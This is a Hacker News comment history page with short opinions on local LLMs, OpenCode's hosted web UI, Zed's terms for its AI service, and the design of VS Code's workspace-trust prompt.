Hacker Newsnew | past | comments | ask | show | jobs | submit | nacs's commentslogin

You should really look at the 2nd link, its much worse than telemetry..

> opencode will proxy all requests internally to https://app.opencode.ai

> There is currently no option to change this behavior, no startup flag, nothing. You do not have the option to serve the web app locally, using `opencode web` just automatically opens the browser with the proxied web app, not a true locally served UI.

> https://github.com/anomalyco/opencode/blob/4d7cbdcbef92bb696...


That is the address of their hosted WebUI which connects to an OpenCode server on your localhost. Would be nice if there was an option to selfhost it, but it is nowhere near as bad as "proxying all requests".

It looks like the author has kept it updated since then.

They mention the "Qwen3.5 (35B)" model for example which was released around 2 weeks ago.


For some anecdata, I've set up Qwen3.5 on a RX 7900XTX last weekend. It runs fine, did some simple coding prompts and got responses in 15-30 seconds. It's my first foray into running models locally just to see what's possible, and I guess I'm happily surprised so far.

Also, the entire setup was done through Codex. I asked Codex to figure out how to run models locally given my architecture (Ubuntu, AMD GPU). It told me which steps to apply and I hit zero snags.


Lossless-cut has both an HTTP api and a CLI so it could be controlled via a lightweight TUI if someone wanted.


They may but note that this isn't an official Newgrounds project - this is just a user ("Bill") posting on his own Newgrounds blog that he has made this (its not Newgrounds' official blog).


I meant Newgrounds the community.


Yep, the email they sent out is terribly worded so it looks like the age requirement is for Zed itself.

Their actual blog ( https://zed.dev/blog/terms-update ) says the age requirement is only for their AI service (still not the best wording but a little clearer):

> Age requirement. You must be 18 or older to use Zed’s AI-enabled software-as-a-service offering (the “Service").


This still sounds odd. Where is this restriction coming from?


It has binding arbitration. I assume/hope you must be an adult to sign away your right to sue.


Speculation I've seen is that whatever LLM they're reselling has this requirement itself and they need to pass it along.

I had expected this to be about their multi-user editing and chat features.


> I really hope more people realize that local LLMs are where it's at

No worries, the AI companites thought ahead - by sending GPU, RAM, and now even harddrive prices through the roof, you won't have a computer to run a local model.


What model and hardware powers this?

Is this a Google T5 based model?


3bit hard-wired Llama 3.1 8B ( https://taalas.com/the-path-to-ubiquitous-ai/ )


3bit is a bit ridiculous. From that page I am unclear if the current model is 3 or 4bit. If it’s 4bit… well, NVIDIA showed that a well organized model can perform almost as well as 8bit.


Works fine for me in Firefox 147.


Local models are quite capable. Obviously a 4B model isn't going to do the job of a trillion parameter SOTA model but there are many local models that are both fast and very usable for these agentic flows.

Qwen 30B and GLM Flash (also around 30B) are both very good for example and I use them regularly.


Thanks for being part of the discussion. Almost every response from you in this thread however comes off an unyielding, "we decided this and it's 100% right"?

In light of this vulnerability, the team may want to revisit some of these assumptions made.

I guarantee the majority of people see a giant modal covering what they're trying to do and just do whatever gets rid of it - ie: the titlebar that says 'Trust this workspace?' and hit the big blue "Yes" button to quickly just get to work.

With AI and agents, there are now a lot of non-dev "casual" users using VS code because they saw something on a Youtube video too that have no clue what dangers they could face just by opening a new project.

Almost noone is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).


Didn't mean to come off that way, I know a lot of the decisions that were made. One thing I've got from this is we should probably open `/tmp/`, `C:\`, ~/`, etc. in restricted mode without asking the user. But a lot of the solutions proposed like opening everything in restricted mode I highly doubt would ever happen as it would further confusion, be a big change to UX and so on.

With AI the warning needs to appear somewhere, the user would ignore it when opening the folder, or ignore the warning when engaging with agent mode.


> Almost noone is going to read some general warning about how it "may" execute code. At the very least, scan the project folder and mention what will be executed (if it contains anything).

I’m not sure this is possible or non-misleading at the time of granting trust because adding or updating extensions, or changing any content in the folder after trust is granted, can change what will be executed.


Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact

Search: